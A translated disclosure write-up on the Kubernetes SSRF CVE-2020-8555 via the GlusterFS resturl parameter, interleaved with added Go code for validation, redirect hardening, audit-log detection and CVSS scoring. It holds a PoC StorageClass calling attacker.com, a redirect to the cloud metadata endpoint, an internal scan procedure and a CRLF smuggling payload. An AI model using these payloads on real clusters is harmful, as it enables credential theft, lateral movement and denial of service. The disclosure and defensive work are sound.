When it's not only about a Kubernetes vulnerability ...

Translator's note: the authors of this article describe in detail how they managed to discover the vulnerability CVE-2020–8555 in Kubernetes. Although at first it did not look particularly dangerous, in combination with other factors its severity turned out to be maximal for some cloud providers. Several organizations rewarded the experts for their work.


Who we are

We are two French security researchers who jointly found a vulnerability in Kubernetes. Our names are Brice Augras and Christophe Hauquiert, but on most Bug Bounty platforms we are known as Reeverzax and Hach respectively.

What happened?

This article is our way of sharing how an ordinary research project unexpectedly turned into one of the most exciting adventures in the life of bug hunters (so far, at least).

As you probably know, bug hunters have a few notable characteristics:

  • they live on pizza and beer;
  • they work while everyone else is asleep.

We are no exception to these rules: we usually meet at weekends and spend sleepless nights hacking. But one of those nights ended in a very unusual way.

Initially we were meeting to discuss our participation in a CTF the following day. During a conversation about Kubernetes security in a managed service environment, we remembered the old idea of SSRF (Server-Side Request Forgery) and decided to try to use it as an attack scenario.

At 11 pm we sat down to do our research and went to bed early in the morning, very satisfied with the results. It was this research that led us to the MSRC Bug Bounty program and to a privilege escalation scenario.

Several weeks/months passed, and our unexpected result led to one of the highest rewards in the history of the Azure Cloud Bug Bounty - in addition to the one we received from Kubernetes!

Based on our research project, the Kubernetes Product Security Committee published CVE-2020–8555.

Now I want to spread information about the vulnerability we found as widely as possible. We hope you appreciate the find and share the technical details with other members of the infosec community!

So here is our story...

Context

To make the best sense of what happened, let's first look at how Kubernetes works in a cloud-managed environment.

When you instantiate a Kubernetes cluster in such an environment, the management layer is usually the responsibility of the cloud provider:

Figure: The control layer sits on the cloud provider's side, while the Kubernetes nodes sit on the customer's side.

To allocate volumes dynamically, a mechanism is used that provisions them on demand from an external storage backend and matches them to a PVC (persistent volume claim, i.e. a request for a volume).

So, once the PVC has been created and bound to a StorageClass in the K8s cluster, the further actions to provision the volume are taken by the kube/cloud controller manager (its exact name depends on the release). (Translator's note: we have already written in more detail about the CCM, using the example of its implementation for one of the cloud providers, here.)

There are several types of provisioners supported by Kubernetes: most of them are included in the orchestrator core, while others are handled by additional provisioners deployed in pods in the cluster.

In our research, we focused on the built-in volume provisioning mechanism, shown below:

Figure: Dynamic volume provisioning using the built-in Kubernetes provisioner

In short, when Kubernetes is deployed in a managed environment, the controller manager is the cloud provider's responsibility, but the volume creation request (number 3 in the diagram above) leaves the cloud provider's internal network. And this is where things get really interesting!

Hacking scenario

In this section we explain how we took advantage of the workflow described above and gained access to the internal resources of the cloud service provider. It also shows how you can go further, for example by obtaining internal credentials or escalating privileges.

One simple manipulation (in this case, Server-Side Request Forgery) made it possible to go beyond the customer environment into the clusters of various providers of managed K8s.

In our research we focused on the GlusterFS provisioner. Although the sequence of actions is described in the context of this provisioner, Quobyte, StorageOS and ScaleIO are affected by the same vulnerability.

Figure: Abuse of the dynamic volume provisioning mechanism

While analysing the GlusterFS storage class in the Golang client source code, we noticed that for the first HTTP request (3) sent during volume creation, /volumes is appended to the end of the custom URL given in the resturl parameter.

We decided to get rid of that extra path by adding # to the resturl parameter. Here is the first YAML configuration we used to test the semi-blind SSRF vulnerability (you can read more about semi-blind, or half-blind, SSRF here, for example - translator's note):

apiVersion: storage.k8s.io/v1
kind: StorageClass
metadata:
  name: poc-ssrf
provisioner: kubernetes.io/glusterfs
parameters:
  resturl: "http://attacker.com:6666/#"
---
apiVersion: v1
kind: PersistentVolumeClaim
metadata:
  name: poc-ssrf
spec:
  accessModes:
  - ReadWriteOnce
  volumeMode: Filesystem
  resources:
    requests:
      storage: 8Gi
  storageClassName: poc-ssrf

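The following Go program is an added example, not code from the article or from Kubernetes. It shows why the trailing # works (the client builds the request URL by concatenation, so the appended /volumes ends up in the URL fragment, which is never sent) and sketches a check that could be applied to the resturl parameter before a StorageClass is admitted. The /volumes suffix is taken from the article; the function names, the check itself and the sample URLs are the example's own assumptions.

```go
package main

import (
	"errors"
	"fmt"
	"net/url"
	"strings"
)

// volumesPath is the suffix that, according to the article, the GlusterFS
// client appends to resturl when it builds the volume-creation request.
const volumesPath = "/volumes"

// effectiveTarget models how resturl + "/volumes" is interpreted as a URL.
// A trailing "#" turns the appended suffix into a fragment, which a client
// never sends on the wire, so the request goes to the path before the "#".
func effectiveTarget(resturl string) (path, fragment string, err error) {
	u, err := url.Parse(resturl + volumesPath)
	if err != nil {
		return "", "", err
	}
	return u.Path, u.Fragment, nil
}

// checkRestURL is a hypothetical admission-time check (not part of
// Kubernetes) for the resturl parameter of a StorageClass that uses one of
// the provisioners discussed in the article. It refuses values that contain
// "#" or "?" (which would cut off the path the client appends), that are not
// plain http/https, or that name no host.
func checkRestURL(resturl string) error {
	if strings.ContainsAny(resturl, "#?") {
		return errors.New("resturl: fragment or query string is not allowed")
	}
	u, err := url.Parse(resturl)
	if err != nil {
		return fmt.Errorf("resturl: %w", err)
	}
	if u.Scheme != "http" && u.Scheme != "https" {
		return errors.New("resturl: scheme must be http or https")
	}
	if u.Hostname() == "" {
		return errors.New("resturl: host is required")
	}
	return nil
}

func main() {
	// Constructed values: the article's PoC URL and a benign-looking backend.
	for _, resturl := range []string{"http://attacker.com:6666/#", "https://heketi.storage.example:8080"} {
		p, f, err := effectiveTarget(resturl)
		fmt.Printf("%-40s path=%q fragment=%q err=%v check=%v\n", resturl, p, f, err, checkRestURL(resturl))
	}
}
```

Run it with `go run` and the PoC URL reports path "/" with fragment "/volumes", which is exactly the truncation the article relies on; the benign backend keeps "/volumes" in the path and passes the check.
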
We then used the kubectl binary to manage the Kubernetes cluster remotely. Cloud providers (Azure, Google, AWS, etc.) typically let you obtain credentials for use with this utility.

Thanks to that, I was able to apply my "special" file. Kube-controller-manager executed the resulting HTTP request:

kubectl create -f sc-poc.yaml

Figure: Response from the attacker's point of view

Shortly after that, we were also able to receive the HTTP response from the target server - via the describe pvc or get events commands in kubectl. And indeed: this default Kubernetes driver is too verbose in its warning/error messages...

Here is an example with a link to https://www.google.fr set as the resturl parameter:

kubectl describe pvc poc-ssrf
# or you can use kubectl get events


With this approach, we were limited to HTTP POST requests and could not obtain the contents of the response body if the return code was 201. So we decided to do further research and extend this attack scenario with new approaches.

The evolution of our research

  • Advanced Scenario #1: Using a 302 redirect from an external server to change the HTTP method and obtain a more flexible way to collect internal data.
  • Advanced Scenario #2: Automating LAN scanning and internal resource discovery.
  • Advanced Scenario #3: Using HTTP CRLF + smuggling ("request smuggling") to create crafted HTTP requests and retrieve data extracted from the kube-controller logs.

Technical details

  • The research used Azure Kubernetes Service (AKS) with Kubernetes version 1.12 in the North Europe region.
  • The scenarios described above were run on the latest Kubernetes releases, except for the third scenario, because it required Kubernetes built with Golang version ≤ 1.12.
  • Attacker's external server - https://attacker.com.

Advanced Scenario #1: Redirecting an HTTP POST request to GET and receiving sensitive data

The original method was improved by configuring the attacker's server to return a 302 HTTP return code, converting the POST request into a GET request (step 4 in the diagram).


The first request (3), coming from the GlusterFS client (Controller Manager), is of the POST type. By following these steps we managed to turn it into a GET:

  • The resturl parameter in the StorageClass points to http://attacker.com/redirect.php.
  • The https://attacker.com/redirect.php endpoint responds with a 302 HTTP status code and the following Location header: http://169.254.169.254. This could be any other internal resource; in this case the redirect link is used only as an example.
  • By default, Golang's net/http library follows the redirect and turns the POST into a GET on a 302 status code, resulting in an HTTP GET request to the target resource.

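The POST-to-GET downgrade is standard net/http redirect behaviour and can be observed locally. The Go program below is an added example, not code from the article or from Kubernetes: it starts two in-process test servers (an "attacker" endpoint that answers 302 Found and an "internal" endpoint standing in for 169.254.169.254), sends one POST through a default client and then through a client whose CheckRedirect refuses loopback, link-local and RFC 1918 targets, and reports what the internal server saw. The server layout, the isInternalHost check and its address list are the example's assumptions.

```go
package main

import (
	"fmt"
	"io"
	"net"
	"net/http"
	"net/http/httptest"
	"strings"
)

// internalNets are address ranges a cloud-side provisioner should never be
// redirected to: loopback, link-local (where metadata services live) and
// RFC 1918 space. The list is this example's assumption.
var internalNets = func() []*net.IPNet {
	var nets []*net.IPNet
	for _, cidr := range []string{"127.0.0.0/8", "169.254.0.0/16", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16"} {
		_, n, _ := net.ParseCIDR(cidr)
		nets = append(nets, n)
	}
	return nets
}()

// isInternalHost reports whether host is a literal IP inside internalNets.
// Hostnames are not resolved here; a production check would also have to
// validate the resolved address at dial time.
func isInternalHost(host string) bool {
	ip := net.ParseIP(host)
	if ip == nil {
		return false
	}
	for _, n := range internalNets {
		if n.Contains(ip) {
			return true
		}
	}
	return false
}

// hardenedClient refuses redirects to internal addresses. When CheckRedirect
// returns an error, net/http hands back the 302 itself instead of fetching
// the Location target.
func hardenedClient() *http.Client {
	return &http.Client{
		CheckRedirect: func(req *http.Request, via []*http.Request) error {
			if isInternalHost(req.URL.Hostname()) {
				return fmt.Errorf("refusing redirect to internal address %s", req.URL.Host)
			}
			return nil
		},
	}
}

// redirectOutcome sends one POST through client to an in-process "attacker"
// server that answers 302 Found with Location pointing at an in-process
// "internal" server. It returns the method the internal server saw ("" if it
// was never reached) and the status code the client ended up with.
func redirectOutcome(client *http.Client) (seenMethod string, status int, err error) {
	seen := make(chan string, 1)
	internal := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		seen <- r.Method
		io.WriteString(w, `{"instance":"constructed metadata"}`)
	}))
	defer internal.Close()

	attacker := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		http.Redirect(w, r, internal.URL+"/metadata", http.StatusFound)
	}))
	defer attacker.Close()

	resp, err := client.Post(attacker.URL+"/redirect.php", "application/json", strings.NewReader("{}"))
	if resp != nil {
		status = resp.StatusCode
	}
	if err == nil {
		io.Copy(io.Discard, resp.Body)
		resp.Body.Close()
	}
	select {
	case seenMethod = <-seen:
	default:
	}
	return seenMethod, status, err
}

func main() {
	m, s, err := redirectOutcome(&http.Client{})
	fmt.Printf("default client:  internal saw %q, status %d, err=%v\n", m, s, err)
	m, s, err = redirectOutcome(hardenedClient())
	fmt.Printf("hardened client: internal saw %q, status %d, err=%v\n", m, s, err)
}
```

With the default client the internal server sees a GET and the caller receives 200 plus the internal body; with the hardened client the internal server is never contacted and the caller keeps the 302 together with an error, which is the behaviour a provisioner that talks to customer-supplied URLs should have.
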
To read the HTTP response body, you need to describe the PVC object:

kubectl describe pvc xxx

Here is an example of the HTTP response in JSON format that we managed to receive:

Figure: the HTTP response received, in JSON format

The exploitation possibilities of the vulnerability at that point were limited by the following:

  • Inability to insert HTTP headers into the outgoing request.
  • Inability to make a POST request with parameters in the body (this would be convenient for requesting a key value from an etcd instance running on port 2379 if unencrypted HTTP were in use).
  • Inability to retrieve the contents of the response body when the status code was 200 and the response did not have a JSON Content-Type.

Advanced Scenario #2: Scanning the local network

This half-blind SSRF method was then used to scan the cloud provider's internal network and poll various listening services (metadata instance, Kubelet, etcd, etc.) based on the kube-controller responses.


First, the standard listening ports of Kubernetes components were identified (8443, 10250, 10251, etc.), and then we had to automate the scanning process.

Since this method of scanning resources is very specific and incompatible with classic scanners and SSRF tools, we decided to write our own workers in a bash script that automates the whole process.

For example, to scan the 172.16.0.0/12 range of the internal network quickly, 15 workers were launched in parallel. The above IP range was chosen only as an example and may need to be changed to the IP range of your particular service provider.

To scan a single IP address and port, you need to do the following:

  • delete the last checked StorageClass;
  • delete the previously checked Persistent Volume Claim;
  • change the IP and port values in sc.yaml;
  • create a StorageClass with the new IP and port;
  • create a new PVC;
  • extract the scan result using describe on the PVC.

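From the API server's side, this loop is a stream of StorageClass and PVC create/delete events from one identity, each StorageClass pointing resturl at a different internal host:port. The Go program below is an added example, not the article's or Kubernetes' code: it reads audit-log events (a few constructed ones are embedded) and flags (1) StorageClasses for the provisioners named in the article whose resturl carries a fragment/query or a literal-IP host, and (2) any user whose StorageClasses target many distinct hosts within the log. The reduced event fields, the watched provisioner list and the threshold are the example's assumptions.

```go
package main

import (
	"bufio"
	"encoding/json"
	"fmt"
	"net"
	"net/url"
	"strings"
)

// sampleAudit holds constructed Kubernetes audit events (one JSON object per
// line, reduced to the fields used here): one legitimate StorageClass from an
// admin, then a tenant creating, deleting and re-creating StorageClasses whose
// resturl points at internal host:port pairs, as the scan loop above does.
const sampleAudit = `
{"verb":"create","user":{"username":"platform-admin"},"objectRef":{"resource":"storageclasses","name":"gluster-prod"},"requestObject":{"provisioner":"kubernetes.io/glusterfs","parameters":{"resturl":"https://heketi.storage.example:8080"}}}
{"verb":"create","user":{"username":"tenant-bob"},"objectRef":{"resource":"storageclasses","name":"poc-ssrf"},"requestObject":{"provisioner":"kubernetes.io/glusterfs","parameters":{"resturl":"http://172.16.0.10:10250/#"}}}
{"verb":"create","user":{"username":"tenant-bob"},"objectRef":{"resource":"persistentvolumeclaims","name":"poc-ssrf"},"requestObject":{"spec":{"storageClassName":"poc-ssrf"}}}
{"verb":"delete","user":{"username":"tenant-bob"},"objectRef":{"resource":"storageclasses","name":"poc-ssrf"}}
{"verb":"create","user":{"username":"tenant-bob"},"objectRef":{"resource":"storageclasses","name":"poc-ssrf"},"requestObject":{"provisioner":"kubernetes.io/glusterfs","parameters":{"resturl":"http://172.16.0.10:2379/#"}}}
{"verb":"create","user":{"username":"tenant-bob"},"objectRef":{"resource":"storageclasses","name":"poc-ssrf"},"requestObject":{"provisioner":"kubernetes.io/glusterfs","parameters":{"resturl":"http://172.16.0.11:10250/#"}}}
`

// auditEvent is the subset of an audit event this detector reads.
type auditEvent struct {
	Verb      string `json:"verb"`
	User      struct{ Username string `json:"username"` } `json:"user"`
	ObjectRef struct {
		Resource string `json:"resource"`
		Name     string `json:"name"`
	} `json:"objectRef"`
	RequestObject struct {
		Provisioner string            `json:"provisioner"`
		Parameters  map[string]string `json:"parameters"`
	} `json:"requestObject"`
}

// watchedProvisioners are the in-core provisioners the article names as
// sharing the resturl behaviour.
var watchedProvisioners = map[string]bool{
	"kubernetes.io/glusterfs": true, "kubernetes.io/quobyte": true,
	"kubernetes.io/storageos": true, "kubernetes.io/scaleio": true,
}

// Finding is one alert: which user, and why.
type Finding struct{ User, Reason string }

// detect reads one JSON audit event per line. Rule 1 fires once per
// StorageClass whose resturl carries a fragment/query or a literal-IP host;
// rule 2 fires once per user whose StorageClasses target at least
// churnThreshold distinct host:port values within the log.
func detect(auditLog string, churnThreshold int) []Finding {
	var findings []Finding
	targets := map[string]map[string]bool{} // username -> set of host:port
	sc := bufio.NewScanner(strings.NewReader(auditLog))
	for sc.Scan() {
		var ev auditEvent
		if line := strings.TrimSpace(sc.Text()); line == "" || json.Unmarshal([]byte(line), &ev) != nil {
			continue // blank or malformed line
		}
		if ev.Verb != "create" || ev.ObjectRef.Resource != "storageclasses" ||
			!watchedProvisioners[ev.RequestObject.Provisioner] {
			continue
		}
		user, name := ev.User.Username, ev.ObjectRef.Name
		resturl := ev.RequestObject.Parameters["resturl"]
		if strings.ContainsAny(resturl, "#?") {
			findings = append(findings, Finding{user, fmt.Sprintf("%s: resturl %q carries a fragment or query", name, resturl)})
		}
		u, err := url.Parse(resturl)
		if err != nil {
			findings = append(findings, Finding{user, fmt.Sprintf("%s: resturl does not parse: %v", name, err)})
			continue
		}
		if net.ParseIP(u.Hostname()) != nil {
			findings = append(findings, Finding{user, fmt.Sprintf("%s: resturl host %s is a literal IP address", name, u.Hostname())})
		}
		if targets[user] == nil {
			targets[user] = map[string]bool{}
		}
		targets[user][u.Host] = true
	}
	for user, hosts := range targets {
		if len(hosts) >= churnThreshold {
			findings = append(findings, Finding{user, fmt.Sprintf("%d distinct resturl targets across StorageClass creates", len(hosts))})
		}
	}
	return findings
}

func main() {
	for _, f := range detect(sampleAudit, 3) {
		fmt.Printf("%-15s %s\n", f.User, f.Reason)
	}
}
```

On the embedded sample the admin's StorageClass produces nothing, while the tenant's three StorageClass creates each raise the fragment and literal-IP findings and, together, the churn finding; in a real deployment the input would be the API server's audit log with a time window applied.
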
Advanced Scenario #3: CRLF injection + HTTP smuggling in "old" versions of the Kubernetes cluster

If, in addition to this, the provider offered customers old versions of the K8s cluster and gave them access to the kube-controller-manager logs, the effect became even more significant.

Indeed, an attacker can then easily alter the HTTP requests in order to obtain a full HTTP response as they see fit.


To carry out the last scenario, the following conditions must be met:

  • The user must have access to the kube-controller-manager logs (as, for example, in Azure LogInsights).
  • The Kubernetes cluster must use a Golang version lower than 1.12.

We set up a local environment that simulated the communication between the GlusterFS Go client and a fake target server (we will refrain from publishing the PoC for now).

The vulnerability found affects Golang versions lower than 1.12 and allows attackers to carry out HTTP smuggling/CRLF attacks.

By combining the half-blind SSRF described above with this, we were able to send requests of our choosing, including replacing headers, the HTTP method, parameters and data, which kube-controller-manager then processed.

Here is an example of a working "bait" for the resturl parameter of the StorageClass that implements a similar attack scenario:

http://172.31.X.1:10255/healthz? HTTP/1.1\r\nConnection: keep-alive\r\nHost: 172.31.X.1:10255\r\nContent-Length: 1\r\n\r\n1\r\nGET /pods? HTTP/1.1\r\nHost: 172.31.X.1:10255\r\n\r\n

The result is an unsolicited error response, a message about which is written to the controller logs. Thanks to the verbosity enabled by default, the contents of the HTTP response message are saved there too.

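Whether a given controller's Go runtime still accepts such a value can be verified without any cluster. The Go program below is an added example, not code from the article: it uses a constructed resturl value with CR/LF inside the URL (a placeholder host and a harmless header name, not the article's payload) and shows that on Go 1.12 and later url.Parse, and therefore http.NewRequest, refuse it outright, alongside a hasControlChars pre-check that a provisioner on an older runtime could apply to the parameter before building the request. Names and sample values are the example's assumptions.

```go
package main

import (
	"fmt"
	"net/http"
)

// craftedRestURL is a constructed resturl value in the shape scenario #3
// relies on: CR/LF inside the URL followed by text that would be read as an
// extra header line if the client wrote the URL to the socket unchecked.
// The host is a placeholder.
const craftedRestURL = "http://kubelet.placeholder.internal:10255/healthz\r\nX-Injected: 1\r\n"

// hasControlChars reports whether s contains any ASCII control byte
// (0x00-0x1F or 0x7F), which has no legitimate place in a REST endpoint URL.
func hasControlChars(s string) bool {
	for i := 0; i < len(s); i++ {
		if s[i] < 0x20 || s[i] == 0x7f {
			return true
		}
	}
	return false
}

// buildVolumeRequest does what the provisioner client does: appends
// "/volumes" and builds a POST. The pre-check rejects control characters
// regardless of the runtime version.
func buildVolumeRequest(resturl string) (*http.Request, error) {
	if hasControlChars(resturl) {
		return nil, fmt.Errorf("resturl contains control characters")
	}
	return http.NewRequest(http.MethodPost, resturl+"/volumes", nil)
}

// buildUnchecked skips the pre-check so that the runtime's own validation is
// visible: on Go 1.12+ net/url rejects control characters in the URL, so the
// crafted value never becomes a request at all.
func buildUnchecked(resturl string) error {
	_, err := http.NewRequest(http.MethodPost, resturl+"/volumes", nil)
	return err
}

func main() {
	_, err := buildVolumeRequest(craftedRestURL)
	fmt.Println("pre-check:", err)
	fmt.Println("runtime  :", buildUnchecked(craftedRestURL))
	req, err := buildVolumeRequest("https://heketi.storage.example:8080")
	fmt.Println("benign   :", req.URL, err)
}
```

Both the pre-check and the runtime reject the crafted value, while the benign backend URL builds a request to /volumes; a controller built with a Go release older than 1.12 would need the pre-check (or an upgrade), which is the precondition the article lists for this scenario.
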

This was our most effective "bait" within the proof of concept.

Using this approach we were able to carry out some of the following attacks on the clusters of various managed k8s providers: privilege escalation using credentials from metadata instances, Master DoS via (unencrypted) HTTP requests to etcd master instances, and so on.

Consequences

In the official Kubernetes statement about the SSRF vulnerability we found, it was rated CVSS 6.3/10: CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N. If we consider only the vulnerability associated with the Kubernetes perimeter, the integrity vector qualifies as None.

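The 6.3 figure can be reproduced from the vector with the CVSS v3.0 base-score formulas. The Go calculator below is an added example, not code from the article; cvss30Base and its weight tables are the example's own, and the second vector in main is a constructed maximal-impact case used only to check the calculator, not the article's managed-environment assessment.

```go
package main

import (
	"fmt"
	"math"
	"strings"
)

// Metric weights from the CVSS v3.0 specification.
var (
	avWeight  = map[string]float64{"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.20}
	acWeight  = map[string]float64{"L": 0.77, "H": 0.44}
	uiWeight  = map[string]float64{"N": 0.85, "R": 0.62}
	ciaWeight = map[string]float64{"H": 0.56, "L": 0.22, "N": 0.0}
	// Privileges Required: {scope unchanged, scope changed}.
	prWeight = map[string][2]float64{"N": {0.85, 0.85}, "L": {0.62, 0.68}, "H": {0.27, 0.50}}
)

// roundUp is the CVSS "round up to one decimal place" rule.
func roundUp(x float64) float64 { return math.Ceil(x*10) / 10 }

// cvss30Base parses a vector such as
// "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N" and returns its base score.
func cvss30Base(vector string) (float64, error) {
	m := map[string]string{}
	for _, part := range strings.Split(vector, "/") {
		kv := strings.SplitN(part, ":", 2)
		if len(kv) != 2 {
			return 0, fmt.Errorf("malformed metric %q", part)
		}
		m[kv[0]] = kv[1]
	}
	if m["CVSS"] != "3.0" {
		return 0, fmt.Errorf("unsupported version %q", m["CVSS"])
	}
	if m["S"] != "U" && m["S"] != "C" {
		return 0, fmt.Errorf("bad S metric %q", m["S"])
	}
	scopeChanged := m["S"] == "C"

	var firstErr error
	weight := func(table map[string]float64, key string) float64 {
		w, ok := table[m[key]]
		if !ok && firstErr == nil {
			firstErr = fmt.Errorf("bad %s metric %q", key, m[key])
		}
		return w
	}
	av, ac, ui := weight(avWeight, "AV"), weight(acWeight, "AC"), weight(uiWeight, "UI")
	c, i, a := weight(ciaWeight, "C"), weight(ciaWeight, "I"), weight(ciaWeight, "A")
	pr, ok := prWeight[m["PR"]]
	if !ok {
		return 0, fmt.Errorf("bad PR metric %q", m["PR"])
	}
	if firstErr != nil {
		return 0, firstErr
	}
	prW := pr[0]
	if scopeChanged {
		prW = pr[1]
	}

	// Impact Sub Score, then Impact and Exploitability per the specification.
	iss := 1 - (1-c)*(1-i)*(1-a)
	impact := 6.42 * iss
	if scopeChanged {
		impact = 7.52*(iss-0.029) - 3.25*math.Pow(iss-0.02, 15)
	}
	exploitability := 8.22 * av * ac * prW * ui
	if impact <= 0 {
		return 0, nil
	}
	if scopeChanged {
		return roundUp(math.Min(1.08*(impact+exploitability), 10)), nil
	}
	return roundUp(math.Min(impact+exploitability, 10)), nil
}

func main() {
	// The article's vector, and a constructed maximal-impact vector used only
	// as a sanity check of the calculator (not the article's 10/10 assessment).
	for _, v := range []string{
		"CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N",
		"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
	} {
		score, err := cvss30Base(v)
		fmt.Printf("%s -> %.1f (err=%v)\n", v, score, err)
	}
}
```

For the article's vector the changed-scope impact comes to about 3.99 and exploitability to about 1.78, so 1.08 × (3.99 + 1.78) ≈ 6.23 rounds up to 6.3; changing the confidentiality, integrity and availability metrics in the same calculator shows how quickly the score climbs once the managed-environment consequences described next are taken into account.
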
However, assessing the possible consequences in the context of a managed service environment (and this was the most interesting part of our research!) prompted us to reclassify the vulnerability as Critical, CVSS 10/10, for many distributors.

Below is additional information to help you understand our reasoning when assessing the possible impact in cloud environments:

Integrity

  • Execute commands remotely using the obtained internal credentials.
  • Reproduce the above scenario using the IDOR (Insecure Direct Object Reference) technique with other resources found on the local network.

Confidentiality

  • Lateral Movement type of attack due to the theft of cloud credentials (for example, via the metadata API).
  • Information gathering by scanning the local network (determining the SSH version, HTTP server version, ...).
  • Collecting instance and infrastructure information by polling internal APIs such as the metadata API (http://169.254.169.254, …).
  • Stealing customer data using the cloud credentials.

Availability

All exploitation scenarios related to the integrity attack vectors can be used for destructive actions and lead to master instances becoming unavailable from the customer perimeter (or any other).

Since we were in a managed K8s environment and were assessing the impact on integrity, we can imagine many scenarios that could affect availability. Some examples include corrupting the etcd database or making a critical call to the Kubernetes API.

Chronology

  • December 6, 2019: Vulnerability reported to MSRC Bug Bounty.
  • January 3, 2020: A third party notified the Kubernetes developers that we were working on a security issue, and asked them to consider the SSRF as an internal (in-core) vulnerability. We then provided a general report with technical details about the origin of the problem.
  • January 15, 2020: We provided technical and general reports to the Kubernetes developers at their request (via the HackerOne platform).
  • January 15, 2020: The Kubernetes developers informed us that the half-blind SSRF + CRLF injection for past releases is considered an in-core vulnerability. We immediately stopped analysing the perimeters of other service providers: the K8s team was now dealing with the root cause.
  • January 15, 2020: MSRC reward received via HackerOne.
  • January 16, 2020: Kubernetes PSC (Product Security Committee) acknowledged the vulnerability and asked to keep it confidential until mid-March because of the large number of potentially affected parties.
  • February 11, 2020: Google VRP reward received.
  • March 4, 2020: Kubernetes reward received via HackerOne.
  • March 15, 2020: Scheduled public disclosure postponed because of the COVID-19 situation.
  • June 1, 2020: Joint Kubernetes + Microsoft statement on the vulnerability.

TL;DR

  • We drink beer and eat pizza :)
  • We found an in-core vulnerability in Kubernetes, although we had no intention of doing so.
  • We carried out additional analysis on the clusters of various cloud providers and were able to increase the damage caused by the vulnerability, receiving additional awesome bonuses.
  • You will find many technical details in this article. We would be happy to discuss them with you (Twitter: @ReeverZax & @__hach_).
  • It turned out that all kinds of formalities and reporting took much longer than expected.


Source: www.habr.com
